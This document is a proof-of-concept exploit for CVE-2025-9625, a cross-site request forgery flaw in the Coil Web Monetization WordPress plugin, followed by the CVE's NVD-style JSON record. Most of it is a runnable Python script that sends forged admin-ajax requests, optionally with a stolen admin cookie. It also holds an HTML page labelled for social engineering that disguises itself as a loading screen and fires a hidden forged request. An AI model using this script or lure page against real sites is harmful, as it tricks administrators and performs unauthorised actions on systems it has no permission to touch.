CVE-2025-9625

import requests import argparse def exploit_csrf(target_url, admin_cookie=None): """ CVE-2025-9625 CSRF PoC Coil Web Monetization Plugin < 2.0.3 Missing nonce validation in maybe_restrict_content function """ # Target endpoint that handles coil-get-css-selector parameter endpoint = target_url.rstrip('/') + '/wp-admin/admin-ajax.php' # Construct CSRF payload # The vulnerable parameter is 'coil-get-css-selector' data = { 'action': 'coil_get_css_selector', # AJAX action hook 'coil-get-css-selector': 'test_selector', # Vulnerable parameter 'post_id': '1' # Target post ID } headers = {} if admin_cookie: headers['Cookie'] = admin_cookie try: print(f'[*] Sending CSRF request to {endpoint}') response = requests.post(endpoint, data=data, headers=headers, timeout=10) if response.status_code == 200: print(f'[+] Request sent successfully') print(f'[+] Response status: {response.status_code}') print(f'[+] Response: {response.text[:200]}') else: print(f'[-] Request failed with status: {response.status_code}') except requests.exceptions.RequestException as e: print(f'[-] Error: {e}') if __name__ == '__main__': parser = argparse.ArgumentParser(description='CVE-2025-9625 CSRF PoC') parser.add_argument('-u', '--url', required=True, help='Target WordPress URL') parser.add_argument('-c', '--cookie', help='Admin session cookie (optional)') args = parser.parse_args() exploit_csrf(args.url, args.cookie) # HTML PoC page for social engineering html_poc = ''' <!DOCTYPE html> <html> <head> <title>Loading...</title> </head> <body> <h1>Please wait while loading...</h1> <img src="http://target-site.com/wp-admin/admin-ajax.php?action=coil_get_css_selector&coil-get-css-selector=test" style="display:none" onerror="window.close()"> <script> // Automatically submit form on page load window.onload = function() { setTimeout(function() { window.close(); }, 1000); }; </script> </body> </html> '''

{"cve": {"id": "CVE-2025-9625", "sourceIdentifier": "[email protected]", "published": "2025-11-18T09:15:53.850", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Coil Web Monetization plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.2. This is due to missing or incorrect nonce validation on the coil-get-css-selector parameter handling in the maybe_restrict_content function. This makes it possible for unauthenticated attackers to trigger CSS selector detection functionality via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/coil-web-monetization/tags/2.0.2/includes/functions.php#L48", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/coil-web-monetization/tags/2.0.2/includes/gating/functions.php#L195", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/coil-web-monetization/tags/2.0.2/includes/gating/functions.php#L202", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4aa4cb93-7af3-4427-a17f-160b27fcebb8?source=cve", "source": "[email protected]"}]}}